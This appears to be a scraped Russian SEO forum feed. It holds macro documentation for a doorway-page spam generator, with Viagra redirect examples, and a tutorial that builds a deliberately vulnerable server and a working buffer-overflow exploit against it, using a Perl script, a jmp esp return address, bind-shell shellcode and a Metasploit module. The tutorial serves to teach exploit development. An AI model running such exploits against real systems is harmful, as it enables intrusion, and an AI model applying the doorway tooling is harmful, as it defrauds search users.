/>[CATURLCLEAR-N] – урл категории без анкора, N – номер строчки категорий (для создания например такого тега <br />&lt;a href=”[CATURLCLEAR-N]“&gt;&lt;img src=”http://вашдомен/images/[RAND-1-40].jpg”&gt;&lt;/a&gt;)<br />[RANDCATURLCLEAR] – рандомный урл категории<br />[CATS] — список урлов категорий<br />[RANDCAT] — рандомная категория<br />[RANDURLCAT] — рандомный урл категории<br />[PREVIOUSKEYWORDURLCAT] – ссылка на предыдущую страницу из текущей категории<br />[NEXTKEYWORDURLCAT] – ссылка на следующую страницу из текущей категории<br />Макросы для текста<br />[KEYWORD] — вставляет текущий кейворд<br />[KEYID], [KEYID1], [KEYID2], [KEYID3], [KEYID4] — при использовании в файле с кеями формата ключевик;параметр;параметр1;параметр2;параметр3;параметр4, макросы заменяются на соответствующий параметр (например: в файле с кеями – viagra;http://viagra.com/viagra.jpg;http://myshop.com/buyviagra.php, в доре – на страничке оптимизированной под кей viagra, макрос [KEYID] заменится на урл картинки с виагрой, а [KEYID1] – на урл со страничкой Вашего шопа с заказом виагры)<br />[BKEYWORD] — текущий кейворд с Большой буквы<br />[RANDKEYWORD] — случайный кейворд<br />[RANDKEYWORDAGAIN] — повторяет значение предыдущего макроса [RANDKEYWORD]<br />[PLUSKEYWORD] — применяется в админке при составлении редиректа. Выдает текущий кейворд странички, где вместо пробелов знак плюса. Например buy+viagra.<br />[MINUSKEYWORD] — , текущий кейворд странички, где вместо пробелов знак минуса. Например buy-viagra<br />[20KEYWORD] — текущий кейворд странички, где вместо пробелов знак %20. Например buy%20viagra<br />[_KEYWORD] — текущий кейворд странички, где вместо пробелов знак _. Например buy_viagra<br />[KEYWORDS] — вставляет текущие кейворды, при генерации нескольких кеев на страницу<br />[BRANDKEYWORD] – случайный кейворд с Большой буквы<br />[SHBKEYWORD] – вставляет текущий кейворд с большой буквы, с перемешанными словами (слова перемешиваются случайным образом).<br />[NICK] — ник&#160; <br />[NICKS-x-y] — случайные ники, где x-y — это min и max кол-во (выбирается рандомно в этих пределах). Например [NICKS-3-6].<br />[TEXT-x-y] — текст из поля «Текст для дора». x-y — это min и max кол-во предложений (выбирается рандомно в этих пределах). Например [TEXT-3-6].<br />[TEXTOPTIM-min_int-max_int-RK|RKU|Слово-min_key-max_key] – вставляет текст, оптимизированный под Слово, или RK – случайный ключевик, или RKU – cлучайный ключевик ссылкой. min_int-max_int – количество предложений, min_key-max_key – количество повторений ключевика. Вот пример: [TEXTOPTIM-3-5-Super Pack-1-2] или [TEXTOPTIM-3-5-RK-1-2].<br />[PLTEXT-1-3-(4|6)] – от 1го до 3х предложений с текстом, где есть от 4 до 6 ключевиков<br />[REALTEXT-1-3] – от 1го до 3х случайных предложений, не уникализированных доргеном (предложения идут по порядку, как в исходном тексте)<br />[CONCRETICA] – создаётся строка случайных ключевиков (2-4 ключа), разделённых запятой и словосочетаниями “, а так же”, “и ещё”<br />[ANEKDOT] – случайная строка из файла yes\data\mod\anekdot.txt (можно вставлять макросы – они тоже будут обработаны доргеном)<br />[CONTENT] – вставка по очереди файлов из папки yes\data\content, количество должно быть не меньше количества генерируемых страниц, формат файлов: 0.txt, 1.txt, 2.txt … (в файлы можно вставлять макросы – они тоже будут обработаны доргеном)<br />[TITLE] — данные из поля «Заголовок страницы»<br />[DESCR] – генерируется описание для страницы состоящее из 1-2 предложений с замешаным текущим кеем, которое нужно вставить в META NAME=”description”<br />[DESCRIPTION] — текст из поля «META Description страницы»<br />[RANDLIST] — случайная строка из файла в папке yes/data/strtxt, указанного в поле «Вставка строчек текста»<br />[RANDLIST-filename] — случайная строка из файла filename.txt в папке yes/data/mod (можно вставлять макросы – они тоже будут обработаны доргеном)<br />[LIST-filename] — вставка по очереди строк из файла filename.txt (находящегося в папке yes/data/mod), первоя строка вставляется в первую сгенерённую страницу дора, вторая – на вторую …<br />[[привет|здрасте|&lt;a href=”[SITE]“&gt;&lt;img src=”[SITE]/images/[ANEKDOT]”&gt;&lt;/a&gt;]] – вставляется рандомный текст из указанных. Можно использовать макросы. Вариантов можно указывать много.<br />Макросы для ссылок<br />[SITE] — путь на главную этого дора<br />[SITECLEAR] — урл дора без http://<br />[INDEX] — анкор на главную страницу<br />[MAP] — урл карты дора<br />[TAGS] — облако тагов из рандомных кейвордов (выбираются самые короткие)<br />[PAGES] — строка с 5 предыдущими и 5 следующими станицами дора с анкорами 1, 2, 3, 4, 5<br />[PAGES-x] — строка с x предыдущими и x следующими станицами дора с анкорами 1, 2, 3, 4, 5…<br />[RANDKEYWORDURL] — гиперссылка на случайную страницу этого дорвея<br />[RANDKEYWORDURLAGAIN] — повторяет значение предыдущего макроса [RANDKEYWORDURL]<br />[RANDKEYWORDURLCLEAR] — урл случайной страницы этого дорвея без анкора<br />[RANDKEYWORDURLCLEARAGAIN] — повторяет значение предыдущего макроса [RANDKEYWORDURLCLEAR]<br />[RANDKEYWORDURL-x-y] — ссылки со случайными кейвордами этого дора. Например [RANDKEYWORDURL-3-8]<br />[RANDBKEYWORDURL-x-y] ссылки со случайными кейвордами этого дора с Большой буквы (ссылки разделены новой строкой)<br />[PREVIOUSKEYWORDURL] – ссылка на предыдущую страницу дора<br />[NEXTKEYWORDURL] – ссылка на следующую страницу дора<br />[BERANDKEYWORDURL-1-3-(&lt;ul&gt;|&lt;/ul&gt;)] – от 1го до 3х кейвордов с разделителями: &lt;ul&gt; – вначале, &lt;/ul&gt; – вконце<br />[OLD-RANDKEYWORDURL] — случайная ссылку с кейвордом из ранее сгенеренных доров данной тематики<br />[OLD-RANDURL] — только случайная ссылку на ранее сгенеренный дор<br />[HREFLINK] – случайная ссылка из файла red\yes\mod\links.txt в формате &lt;a href=”http://ссылка-из-файла/”&gt;случайный кейворд&lt;/a&gt; <br />Разное<br />[RAND-x-y] — случайное число или цифра (например [RAND-1-26])<br />[COUNTRAND-X-Y]…[COUNTRAND] – [COUNTRAND-X-Y] – рандомная цифра от X до Y, [COUNTRAND] – повторяет её <br />[RANDBLOCK-filename] — вставка рандомных блоков из указанного файла filename.txt (находящегося в папке yes/data/mod), разделитель блоков &lt;!– hesoyam rb –&gt;, в блоках можно использовать другие макросы – они тоже будут обработаны<br />[DOIT-X-Y]кусок шаблона[/DOIT] — – кусок шаблона будет повторятся от X до Y раз (можно вставлять макросы – они тоже будут обработаны доргеном)<br />[RANDPIC-папка_с_картинками-папка_дора_с_картинками] — адрес для рандомной картинки из папки yes/data/mod/папка_с_картинками, картинка копируется с дором в папку папка_дора_с_картинками (например в шаблоне&#160; – рандомная картинка из папки yes/data/mod/img/randpic.jpg копируется в создаваемую папку images с дором и макрос заменяется на )<br />[DATE] — рандомная дата<br />[DATE-x] — рандомная дата, где x – номер даты (например [DATE-1] будет вставлять везде одинаковую дату в пределах одной страницы)<br />[N] — номер страницы<br />[REDIRECT] — редирект</p> mybb@mybb.ru (reaktor) Thu, 27 Jan 2011 21:37:49 +0300 http://realseo.mybb.forum/viewtopic.php?pid=36#p36 http://realseo.mybb.forum/viewtopic.php?pid=35#p35 <p>[KEYWORD] — вставляет текущий кейворд<br />[BKEYWORD] — текущий кейворд с Большой буквы<br />[RANDLIST] — случайная строка из файла, указанного в поле &quot;Вставка строчек текста&quot;<br />[RANDKEYWORD] — случайный кейворд<br />[OLD-RANDKEYWORDURL] — случайная ссылку с кейвордом из ранее сгенеренных доров данной тематики<br />[OLD-RANDURL] — только случайная ссылку на ранее сгенеренный дор<br />[RANDKEYWORDURL-x-y] — ссылки со случайными кейвордами этого дора. Например [RANDKEYWORDURL-3-8]<br />[RANDBKEYWORDURL-x-y] ссылки со случайными кейвордами этого дора с Большой буквы (ссылки разделены новой строкой)<br />[RAND-x-y] — случайное число или цифра (например [RAND-1-26])<br />[RANDKEYWORDURL] — гиперссылка на случайную страницу этого дорвея<br />[NICK] — ник :)<br />[TEXT-x-y] — текст из поля &quot;Текст для дора&quot;. x-y — это min и max кол-во предложений (выбирается рандомно в этих пределах). Например [TEXT-3-6].<br />[REDIRECT] — редирект<br />[TITLE] — данные из поля &quot;Заголовок страницы&quot;<br />[SITE] — путь на главную этого дора<br />[DESCRIPTION] — текст из поля &quot;META Description страницы&quot;<br />[TAGS] — облако тагов из рандомных кейвордов (выбираются самые короткие)<br />[DATE] — рандомная дата<br />[N] — номер страницы<br />[PLUSKEYWORD] — применяется в админке при составлении редиректа и в самом шаблоне. Выдает текущий кейворд странички, где вместо пробелов знак плюса. Например buy+viagra. <br />[UNDERSCOREKEYWORD] — применяется в админке при составлении редиректа и в самом шаблоне. Выдает текущий кейворд странички, где вместо пробелов знак нижнего подчеркивания. Например buy_viagra.<br />[HYPHENKEYWORD] — применяется в админке при составлении редиректа и в самом шаблоне. Выдает текущий кейворд странички, где вместо пробелов знак дефиса. Например buy-viagra.<br />[TEXT-x-y] — текст из поля &quot;Текст для дора&quot;. x-y — это min и max кол-во предложений (выбирается рандомно в этих пределах). Например [TEXT-3-6].<br />[MAP] — будет вставлена в это место карта сайта, если включена галочка &quot;Встроить карту в дизайн&quot;<br />[SETKA] — случайная ссылка для общей перелинковки доров (при пакетной генерации)<br />[[привет|здрасте|Добрый день|салют]] - вставляется рандомный текст из указанных. Вариантов можно указывать много (до 100).</p> mybb@mybb.ru (reaktor) Thu, 27 Jan 2011 21:34:19 +0300 http://realseo.mybb.forum/viewtopic.php?pid=35#p35 http://realseo.mybb.forum/viewtopic.php?pid=22#p22 <p>Откуда берутся сплоиты? Задумывался ли ты, каким образом тусклая новость из багтрака превращается в реально работающую отмычку? каким образом двумя десяткам строчек кода удается получить шелл на удаленном сервере? Сегодня мы посетим фабрику сплоитов и во всех подробностях посмотрим, как изготавливается качественное изделие. </p> <p>Сплоит — что же это за зверь такой диковинный? По сути, это программа, написанная с целью использования уязвимости — в ОС, обычной программе или веб-приложении.</p> <p>Он может представлять из себя что угодно — программку на С/С++ (Delphi, Asm), скриптик на Perl или PHP, или даже находиться внутри картинки, но главное, что он влияет на уязвимую систему и заставляет ее работать так, как она не запрограммирована. Удаленный эксплоит работает через сеть и использует уязвимость без какого-либо предварительного доступа к уязвимой системе. Локальные же сплоиты запускаются непосредственно в уязвимой системе, требуя предварительного доступа к ней и обычно используются для повышения привилегий. Сплоиты можно разделить по типу используемой уязвимости: переполнение буфера, SQL-инъекция, межсайтовый скриптинг и т.д.</p> <p>Короче говоря, разновидностей бывает много и каждая из них отличается как техникой исполнения, так и своей целью. Но есть в них одно общее — все они содержат код, выполняющий задуманные хакером действия. Этот код называют: байт-код, шелл-код (так как очень часто он предоставляет доступ к шеллу на удаленной системе), полезной (боевой) нагрузкой (payload). Написание такого кода — целое искусство. Если хочешь разобраться в этой области, советую начать со статьи Step'а «Откуда берутся шелл-коды» (PDF прилагается на диске). Мы же рассмотрим процесс написания эксплоита, а шелл-код возьмем уже готовый из пакета Metasploit.<br />Пишем жертву для экспериментов</p> <p>Убежден, что нет более наглядного способа продемонстрировать создание боевого кода, чем на конкретном примере. Поэтому начнем с игры в горе-программистов и наваяем небольшое серверное приложение, оставив в нем критическую уязвимость, которую и будем эксплуатировать. Приложение будет принимать подключения на определенном порту: как только придет некоторый пакет, будет вызываться функция, выполняющая некоторые действия с полученными данными, после чего приложение завершается. Скелет приложения приведен ниже, а полный исходник ты найдешь на диске:</p> <p>void pr( char *str)</p> <p>&#160; {</p> <p>&#160; char buf[500]=&quot;&quot;;</p> <p>&#160; strcpy(buf,str); // вот и сама уязвимость, собственной персоной</p> <p>&#160; }</p> <p>&#160; int main(int argc, char **argv)</p> <p>&#160; {</p> <p>&#160; ...</p> <p>&#160; int bytesRecv = SOCKET_ERROR;</p> <p>&#160; while( bytesRecv == SOCKET_ERROR )</p> <p>&#160; {</p> <p>&#160; //Получаем данные, отправленные клиентом</p> <p>&#160; bytesRecv = recv( clientSocket,</p> <p>&#160; Message, 5000, 0 );</p> <p>&#160; if ( bytesRecv == 0 ||</p> <p>&#160; bytesRecv == WSAECONNRESET )</p> <p>&#160; {</p> <p>&#160; printf( &quot;\nConnection Closed.\n&quot;);</p> <p>&#160; break;</p> <p>&#160; }</p> <p>&#160; }</p> <p>&#160; pr(Message); // вызываем функцию, которая не проверяет длину входного буфера при копировании</p> <p>&#160; closesocket(clientSocket);</p> <p>&#160; closesocket(serverSocket);</p> <p>&#160; WSACleanup();</p> <p>&#160; return 0;</p> <p>&#160; }</p> <p>Внимательно взглянув на код, можно увидеть, что функция void pr(char *str) не проверяет длину входного буфера и, если передать ей в качестве параметра строку длиной более 500 символов — получится классическое переполнение буфера. Совсем кратко о том, как это работает (тут придется вспомнить, как работает стек):</p> <p>PUSH EDI // кладем в стек указатель на буфер, который будем копировать (*str)</p> <p>&#160; CALL Server._pr // вызываем функцию pf </p> <p>После вызова CALL стек будет выглядеть следующим образом:</p> <p>...<br />buf — локальная переменная, куда будем копировать входящие данные<br />ebp — сохраненный указатель кадра стека<br />ret — адрес возврата<br />*str — указатель на входящий буфер<br />...</p> <p>Под переменную buf у нас выделено 500 байт. А что будет, если скопировать туда строку длиннее?</p> <p>[buf][EBP][ret][*str]</p> <p>&#160; [AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]</p> <p>Как видишь, такая строка затрет EBP, адрес возврата и все, что расположено ниже по стеку. Т.е. можно перезаписать адрес возврата нужным нам значением и тогда при выходе из функции мы можем вернуться, куда захотим, например, на наш шелл-код. Тут, правда, стоит сделать поправку — уязвимости может и не быть. В смысле, от такой критической ошибки, конечно, никуда не деться, и программа в любом случае будет падать, однако использовать переполнение в сплоите может не получиться. Виной тому — стековые куки — специальная защита, включаемая в бинарник компилятором во время сборки приложения. Существует несколько способов обхода такой защиты (подробнее — во врезке), но сейчас для простоты примера представим, что стековые кукисы отключены. Поэтому либо отключаем поддержку кукисов во время компиляции в Visual Studio, либо используем компилятор, который вообще не умеет встраивать подобную защиту. Второй вариант, как мне кажется, проще — потому как можно использовать бесплатный компилятор lccwin32 (wwwcs.virginia.edu/~lccwin32). Итак, компилируем и запускаем.<br />Убить наповал!</p> <p>Сервер работает ровно до тех пор, пока ему не придет строка, состоящая более чем из 500 символов. В противном случае —<br />непременно вылет приложения. Набросаем небольшой скриптик на Perl'е для эксплуатации переполнения буфера:</p> <p>use strict;</p> <p>&#160; use Socket;</p> <p>&#160; my $junk = &quot;\x41&quot; x1000;</p> <p>&#160; # адрес и порт узявимого демона</p> <p>&#160; my $host = shift || 'localhost';</p> <p>&#160; my $port = shift || 200;</p> <p>&#160; my $proto = getprotobyname('tcp');</p> <p>&#160; # осуществляем привязки</p> <p>&#160; my $iaddr = inet_aton($host);</p> <p>&#160; my $paddr = sockaddr_in($port,<br />&#160; $iaddr);</p> <p>&#160; print &quot;[+] Setting up socket\n&quot;;</p> <p>&#160; # создаем сокет и присоединяемся к порту</p> <p>&#160; socket(SOCKET, PF_INET,<br />&#160; SOCK_STREAM, $proto) <br />&#160; or die &quot;socket: $!&quot;;</p> <p>&#160; print &quot;[+] Connecting to $host on <br />&#160; port $port\n&quot;;</p> <p>&#160; connect(SOCKET, $paddr) or die &quot;connect: $!&quot;;</p> <p>&#160; print &quot;[+] Sending payload\n&quot;;</p> <p>print SOCKET $junk.&quot;\n&quot;;</p> <p>print &quot;[+] Payload sent\n&quot;;</p> <p>close SOCKET or die &quot;close: $!&quot;;</p> <p>Скрипт просто соединяется с сервером и посылает ему строку символов «А» длиной 1000 ($junk = &quot;\x41&quot; x1000). Чтобы наглядно посмотреть, что в момент получения такой строки происходит внутри нашего сервера, запускаем его под отладчиком — идеально, под OllyDbg (wwwollydbg.de). Выбираем наш бинарник через меню «File ET Open» и отдаем команду на выполнение: «Debug t: Restart nt Run». Далее запускаем простенький сплоит, который, как и следовало ожидать, убивает наш сервер наповал. Смотрим в отладчик — адрес возврата из функции pf (и, как следствие, регистр EIP, указывающий на следующую инструкцию) оказывается перезаписанным значением 41414141 (как ты помнишь, 0х41 — это символ А). </p> <p>Но на момент, когда мы будем глядеть в отладчик, уже произойдет возврат по адресу 41414141, и мы будем видеть только EIP. Для успешной эксплуатации уязвимости нужно построить ядовитую строку так, чтобы она переписывала адрес возврата нужным нам значением — адресом нашего шелл-кода. Поэтому сначала необходимо выяснить, какие именно символы строки затирают адрес возврата. В этом поможет одна из утилит Metasploit Framework. Но перед этим предлагаю тебе быстренько ознакомиться с фреймворком.<br />Используем METASPLOIT для разработки эксплоита</p> <p>Символов в передаваемой строке 1000, все они одинаковые, поэтому неудивительно, что в строке возврата появляется значение, состоящее из буквы A. Но если составить строку, которая будет состоять из неповторяющихся буквенно-числовых строк, то легко определить позицию тех символов, которые попадают в адрес возврата. Генерацией такой строки как раз и занимается утилита, входящая в состав Metasploit, pattern_gererate. В качестве единственного обязательного параметра передается длина строки. Итак, создадим буфер длиной в 1000 символов для дальнейшего использования в нашем сплоите:</p> <p>msf &gt; ruby pattern_create.rb 1000</p> <p>&#160; Aa0Aa1Aa2Aa3 [967 символов вырезано злым редактором] Bh0Bh1Bh2Bh</p> <p>А в скрипте заменим значение переменной $junk на вышеприведенную последовательность. Заново запускаем наш уязвимый сервер, подключаемся к нему в OllyDbg и запускаем эксплоит. Сервер опять падает. Что ж, давай взглянем, что на этот раз оказалось в регистре EIP? EIP = 41387141.</p> <p>Чтобы определить смещение символов в строке, используем другую утилиту из набора Metasploit — pattern_offset, передавая в параметрах искомую величину и длину буфера:</p> <p>my $totalbuffer = 1000;</p> <p>&#160; # длина буфера</p> <p>&#160; my $junk = &quot;\x41&quot; x 504;</p> <p>&#160; # первые 504 символа &quot;А&quot;</p> <p>&#160; my $eipoverwrite = &quot;\x42&quot; x 4;</p> <p>&#160; # 4 символа &quot;В&quot;, которые перезапишут адрес возврата</p> <p>&#160; my $junk2 = &quot;\x43&quot; x ($totalbufferlength($</p> <p>&#160; junk.$eipoverwrite));</p> <p>&#160; # оставшееся место в буфере заполняем символами &quot;С&quot;</p> <p>И заменяем строчку кода, отправляющую сформированную строку в сокет, на:</p> <p>print SOCKET $junk.$eipoverwrite.$junk2.&quot;\ n&quot;;</p> <p>Чтобы проверить, запускаем эксплоит и смотрим в отладчик. Ага, так и есть: EIP = 42424242. Увы, тысячи символов слишком мало, чтобы уместить шелл-код, поэтому попробуем увеличить длину ядовитой строки и посмотреть, как будет работать сплоит. Длину выбираем экспериментально: методом проб и ошибок. После увеличения длины с 1000 до 2000 (my $totalbuffer = 2000) убеждаемся, что сплоит по-прежнему работает так же успешно. А это значит, мы имеем 2000-4-504=1492 байта для размещения нашего шелл-кода. Все это прекрасно, но как передать управление шелл-коду — ведь его адреса мы не знаем!</p> <p>Давай посмотрим, что у нас происходит со стеком в момент переполнения. Поставим в отладчике бряк на функцию strcpy. bpx strcpy не работает — значит, поставим бряк вручную. Как видно из исходников, вызов strcpy происходит в функции pf, которая вызывается непосредственно после цикла while() в main. В цикле у нас происходит вызов recv: попробуем поставить бряк на него с помощью команды bpx recv. Ага, сработало! Теперь смотрим чуть ниже цикла и видим вызов call server._pf. Становимся на этой инструкции, нажимаем &lt;Enter&gt; и попадаем в функцию pf. В ней есть всего один call — вызов strcpy. Он-то нам и нужен: переходим на него и нажимаем &lt;F2&gt; для установки брэйкпоинта.</p> <p>0040130B: CALL 00404351</p> <p>Далее запускаем эксплоит. Бряк сработал, — смотрим, что в стеке (в olly стек показывается в правом нижнем углу и имеет формат «адрес — значение — комменарий; типа return to kernel32.728232»):</p> <p>[buf][ebp][ret][предыдущий стековый фрейм]</p> <p>&#160; Нажимаем &lt;F8&gt; (перейти на следующую инструкцию) и</p> <p>&#160; отмечаем изменения в стеке:</p> <p>&#160; [buf][ebp][ret][пред. стековый фрейм]</p> <p>&#160; [AAAAAAAA][BBB][CCCCCCCC…]</p> <p>&#160; Теперь взглянем на конец функции pf:</p> <p>&#160; 00401313 POP EDI</p> <p>&#160; 00401314 POP ESI</p> <p>&#160; 00401315 LEAVE</p> <p>&#160; 00401316 RETN</p> <p>При вызове команды LEAVE происходит следующее: MOV ESP, EBP //теперь в ESP содержится адрес [ebp] POP EBP // в EBP заносится значение из [ebp] (эта область у нас перезаписана символами «А», следовательно, EBP будет равен 41414141), ESP теперь указывает на адрес возврата.</p> <p>При выполнении команды RETN из стека выталкивается адрес возврата — поэтому получается, что ESP указывает на начало стекового фрейма, то есть на $junk2, где мы и будем размещать наш шелл-код. А как перейти по адресу, лежащему в esp? Хороший вопрос! Переход к ESP — вполне обычное действие для виндовых приложений. Более того, любое такое приложение использует, как минимум, одну системную DLL’ку, в которых есть инструкции на любой вкус. Адреса в таких DLL'ках, как правило, статичны и не изменяются!<br />Получается, если найти инструкцию перехода на ESP (а это либо jmp esp, либо push esp + ret, либо call esp), взять ее адрес и заменить им адрес возврата, то на выходе из функции управление передастся на ESP — прямиком нашему шелл-коду.</p> <p>Есть один момент, который стоит упомянуть! Адрес возврата не должен содержать нулевых байтов, ведь функция strcpy воспримет все как признак конца строки и не скопирует оставшуюся часть буфера, то есть $junk2, куда мы хотели разместить шелл-код. Поэтому мы будем искать инструкцию перехода по esp в динамических библиотеках, используемых приложением, так как адрес такой инструкции в библиотеках будет выше, и не будет занимать все четыре байта — исключая возможность появления нуля в начале.</p> <p>Осуществлять поиск будем с помощью полезной утилиты findjmp, входящей в состав пакета тулз MSF eXploit Builder (wwwsecurinfos.info/metasploit/MSF_XB.php) — он нам понадобится и позже. Прога ищет адрес команды call, jmp, push + регистр и ret в dll или приложении. Наша программа работает с сокетами, и значит, она будет использовать стандартную виндовую библиотеку ws2_32.dll. Посмотрим, есть ли там интересующий нас опкод (то есть машинные инструкции, соответствующие передаче управления на ESP). Запускаем с указанием, во-первых, библиотеки для поиска, и, во-вторых, нужного регистра:</p> <p>Findjmp2.exe ws2_32.dll esp</p> <p>&#160; Scanning ws2_32.dll for code</p> <p>&#160; useable with the esp register</p> <p>&#160; 0x71AB9372 push esp — ret</p> <p>&#160; Finished Scanning ws2_32.dll for</p> <p>&#160; code useable with the esp register</p> <p>&#160; Found 1 usable addresses</p> <p>Найден один подходящий нам адрес — 0x71AB9372. Кстати, если вдруг нужного опкода в другой ситуации не найдется — не беда, можно поискать в kernel32.dll, которая используется всеми приложениями. Аналогичный поиск по этой библиотеке дает еще два подходящих адреса. В действительности, это не самый удачный вариант и искать опкоды в системных библиотеках стоит в самом последнем случае.<br />Дело в том, что библиотеки различаются от системе к системе и даже от версии сервиспака, установленного в винде. Адрес 0x71AB9372 действителен только для английской Windows XP SP2 — для другой системы он будет другой! </p> <p>Именно поэтому подходящие опкоды стоит искать в DLL'ках, которые устанавливает в систему сама программа — только в этом случае есть шанс написать независящий от версии Widnows сплоит. В нашем случае, увы, такой вариант невозможен в виду простоты примера, но свои динамические библиотеки для реального виндового приложения — это в большинстве случаев норма. Осталось только создать шелл-код. Как я уже говорил, к сплоиту предъявляется одно важное требование — он не должен содержать нулевых байтов. </p> <p>В программе копируется строка, и если встретится «0», он будет воспринят как конец строки. Соответственно, оставшаяся часть строки не скопируется, а неполный шелл-код, естественно, не будет работать. В создании шелл-кода нам опять поможет Metasploit и консольный интерфейс для управления фреймворком. Итак, запускаем консоль tools/msfconsole и вводим следующее:</p> <p>msf &gt; use windows/shell_bind_tcp</p> <p>&#160; // будем использовать этот payload</p> <p>&#160; msf payload(shell_bind_tcp) &gt; set</p> <p>&#160; LPORT 5555 // устанавливаем значение</p> <p>&#160; порта на удаленной машине</p> <p>LPORT =&gt; 5555</p> <p>С помощью команды «generate -h» посмотрим опции, которые можно указать для генерации шелл-кода:</p> <p>•b &lt;opt&gt; — список символов, которые следует исключить из шелл-кода;<br />•f &lt;opt&gt; — имя файла, куда сохраняется шелл-код;<br />•t &lt;opt&gt; — тип шелл-кода: ruby, perl, c или raw.</p> <p>Указываем, что надо избегать байтов '\x00\xff', генерировать код для Perl'a и сохранить полученные результаты в c:\\shellcode.bin:</p> <p>msf payload(shell_bind_tcp) &gt;</p> <p>&#160; generate -b '\x00\xff' -f c:\\</p> <p>&#160; shellcode.bin -t perl</p> <p>&#160; [*] Writing 1747 bytes to c:\</p> <p>&#160; shellcode.bin...</p> <p>Вот теперь, имея на руках шелл-код, настало время собрать полноценный эксплоит. Единственное — нужно помнить несколько моментов:</p> <p>• в шелл-коде не должны встречаться 0xff и 0x00 байты, но мы об этом уже позаботились;<br />• непосредственно перед шелл-кодом нужно поместить цепочки из NOP (машинная команда — нет операции) — на случай, если мы чутьчуть накосячили с адресом возврата.</p> <p>Отправляемая серверу строка будем формироваться следующим образом:</p> <p>my $junk = &quot;\x90&quot; x 504; // первые 504 NOP’a</p> <p>&#160; #jmp esp (from ws2_32.dll)</p> <p>&#160; my $eipoverwrite = <br />&#160; pack('V',0x71AB9372); // перезаписываем адрес возврата значением 0x71AB9372</p> <p>&#160; #add some NOP's</p> <p>&#160; my $shellcode=&quot;\x90&quot; x 50; // добавляем</p> <p>&#160; 50 nop-ов перед шелл-кодом</p> <p>&#160; // прибавляем сгенерированный нами шелл-код (windows/shell_bind_tcp)</p> <p>&#160; $shellcode=$shellcode.&quot;\xbb\x2e\ [и тут тоже кушал редактор ] xd3&quot;;</p> <p>Окончательная строка, отправляемая в сокет:</p> <p>// и отправляем ядовитую строку серверу</p> <p>&#160; print SOCKET $junk.$eipoverwrite.$s</p> <p>&#160; hellcode.&quot;\n&quot;;</p> <p>После чего пытаемся в сплоите установить соединение с удаленной машиной на 5555 порту, который мы указали при генерации шелл-кода:</p> <p>system(&quot;telnet $host 5555&quot;);<br />Запускаем эксплоит и… о чудо, он работает!</p> <p>Протестировав эксплоит на различных ОС (Windows XP SP3), можно увидеть, что значение смещения не меняется — меняется только наш адрес возврата.<br />Эксплоит для METASPLOIT</p> <p>Итак, у нас есть сплоит для конкретной платформы с вполне определенной нагрузкой, открывающей в системе шелл. Так зачем нужна вообще какая-либо специальная платформа для создания сплоита, если мы вполне обошлись силами одного лишь Perl'а?</p> <p>Причина в том, что Metasploit предоставляет огромное количество заготовок, реализаций различных протоколов, одну из самых больших баз шелл-кодов, payload-ов, которые можно использовать при написании собственного эксплоита. Вместо убогого скрипта на Perl'е можно написать модуль для Metasploit, после чего запускать его на любой платформе и выбирать payload на свой вкус! Чуешь разницу? Предлагаю прямо сейчас усовершенствовать наш сплоит, переписав его для Metasploit, и посмотреть, как это работает. Само собой, он будет обладать возможностью выбора платформы для атаки, а выбирать пейлоад ты сможешь прямо во время ее исполнения. Любой эксплоит для Metasploit имеет фиксированную структуру, которая состоит из объявления заголовочных файлов, подключения ядра msf/core, определения класса эксплоита, в котором описывается его функциональность.</p> <p>Я не буду приводить здесь полный исходник модуля, но выкладываю на диске. Рекомендую для большей ясности открыть его прямо сейчас и далее читать мое практически построчное объяснение кода. Первое, с чего начинается любой сплоит, — это подключение ядра Metasploit Framework: require 'msf/core' Функциональность любого сплоита описывается с помощью класса, где настройки задаются с помощью параметров, а функциональность — с помощью методов. Создаваемый объект наследуется от одного из предопределенных классов. Поскольку мы создаем удаленный сплоит, то и наследуем наш объект от родительского класса «Удаленный эксплоит».</p> <p>В синтаксисе Ruby это делается так:</p> <p>class Metasploit3 &lt;</p> <p>Msf::Exploit::Remote.</p> <p>Большая заслуга Metasploit в том, что он унифицирует большое количество параметров и действий, позволяя использовать готовые конструкции вновь и вновь. Первый элемент разрабатываемого класса — секция include, где мы подключаем обработчик для нужного нам протокола. В Metasploit есть обработчики для http, ftp и других протоколов, что позволяет быстрее писать эксплоиты, не заморачиваясь с их собственной реализацией. Наш эксплоит использует TCP-подключение, поэтому код будет выглядеть следующим образом:</p> <p>include Msf::Exploit::Remote::Tcp</p> <p>Далее весь сплоит делится на два метода:</p> <p>метод инициализации, в котором мы указываем информацию, необходимую для успешного выполнения эксплоита, и метод эксплуатации, в котором мы отправляем на сервер ядовитую строку. Начнем с инициализации. Параметр Payload задает длину ядовитого буфера и недопустимые символы (в нашем случае — 0х00 и 0xff):</p> <p>'Payload' =&gt;</p> <p>&#160; {</p> <p>&#160; 'Space' =&gt; 1400,</p> <p>&#160; 'BadChars' =&gt; &quot;\x00\xff&quot;,</p> <p>&#160; }</p> <p>Далее определяем цели эксплоита и специфичные для каждой цели параметры, такие как адрес возврата, смещение и т.д.:</p> <p>'Platform' =&gt; 'win',</p> <p>&#160; 'Targets' =&gt;</p> <p>&#160; [</p> <p>&#160; ['Windows XP SP2 En',</p> <p>&#160; { 'Ret' =&gt; 0x0x71ab9372,</p> <p>&#160; 'Offset' =&gt; 504 } ],</p> <p>&#160; ['Windows 2003 Server R2 SP2',</p> <p>&#160; { 'Ret' =&gt; 0x71c02b67,</p> <p>&#160; 'Offset' =&gt; 504 } ],</p> <p>&#160; ...</p> <p>&#160; ]</p> <p>Обрати внимание, мы не определяем сам шелл-код — то есть, нагрузку, которую выполнит сплоит. Действие на удаленной машине будет выбираться интерактивно во время работы в консоли Metasploit'ом. Сейчас нам остается только написать самое главное — метод для эксплуатации уязвимости.</p> <p>С помощью команды connect устанавливаем TCP-соединение (обработчик протокола мы подключили выше и даже указали порт, помнишь?), далее — определяем ядовитую строку и передаем ее в сокет, после чего разрываем соединение. Ядовитый буфер состоит из цепочки NOP-команд, величины Offset — затем к ней прибавляется адрес возврата, еще небольшая NOP-цепочка и зашифрованный PAYLOAD. Все вместе выглядит так:</p> <p>def exploit</p> <p>&#160; connect</p> <p>&#160; junk = make_nops(target['Offset'])</p> <p>&#160; sploit = junk + [target.ret].</p> <p>&#160; pack('V') + make_nops(50) +</p> <p>&#160; payload.encoded</p> <p>&#160; sock.put(sploit)</p> <p>&#160; handler</p> <p>&#160; disconnect</p> <p>&#160; end</p> <p>Вот и все, наш первый модуль для Metasploit готов! Чтобы его можно было использовать, скопируем исходник в папку modules/exploits/test (если не нравится test — можешь скопировать в windows/misc, например). 